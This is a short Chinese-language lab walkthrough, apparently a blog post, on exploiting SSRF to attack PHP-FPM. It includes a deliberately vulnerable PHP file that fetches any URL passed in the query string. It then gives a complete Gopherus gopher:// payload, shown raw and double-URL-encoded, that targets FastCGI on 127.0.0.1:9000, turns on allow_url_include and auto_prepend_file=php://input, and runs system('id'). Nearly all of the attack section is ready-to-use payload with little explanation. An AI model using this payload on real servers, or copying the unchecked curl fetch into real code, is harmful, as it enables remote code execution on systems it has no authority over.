文章目录
- 环境搭建
- 使用网页查看
- 开始攻击
环境搭建
在/usr/local/nginx/html下新建一个php文件
phpinfo.php
1.php
<?php
highlight_file(__FILE__);
$url = $_GET['url'];
$curl = curl_init($url);
curl_setopt($curl, CURLOPT_HEADER, 0);
$responseText = curl_exec($curl);echo $responseText;
curl_close($curl);
?>
使用网页查看
测试一下确实存在ssrf。
查看响应包,中间件为nginx,那么他用的就是php-fpm,那么端口也就是9000.
开始攻击
利用gopherus伪造请求进行攻击
gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%04%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH54%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/usr/share/php/PEAR.php%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%006%04%00%3C%3Fphp%20system%28%27id%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00
解码查看
也就是fpf的未授权访问
进行二次编码,然后进行测试
gopher%3A%2F%2F127%2E0%2E0%2E1%3A9000%2F%5F%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2501%2504%2504%2500%250F%2510SERVER%5FSOFTWAREgo%2520%2F%2520fcgiclient%2520%250B%2509REMOTE%5FADDR127%2E0%2E0%2E1%250F%2508SERVER%5FPROTOCOLHTTP%2F1%2E1%250E%2502CONTENT%5FLENGTH54%250E%2504REQUEST%5FMETHODPOST%2509KPHP%5FVALUEallow%5Furl%5Finclude%2520%253D%2520On%250Adisable%5Ffunctions%2520%253D%2520%250Aauto%5Fprepend%5Ffile%2520%253D%2520php%253A%2F%2Finput%250F%2517SCRIPT%5FFILENAME%2Fusr%2Fshare%2Fphp%2FPEAR%2Ephp%250D%2501DOCUMENT%5FROOT%2F%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%25006%2504%2500%253C%253Fphp%2520system%2528%2527id%2527%2529%253Bdie%2528%2527%2D%2D%2D%2D%2DMade%2Dby%2DSpyD3r%2D%2D%2D%2D%2D%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500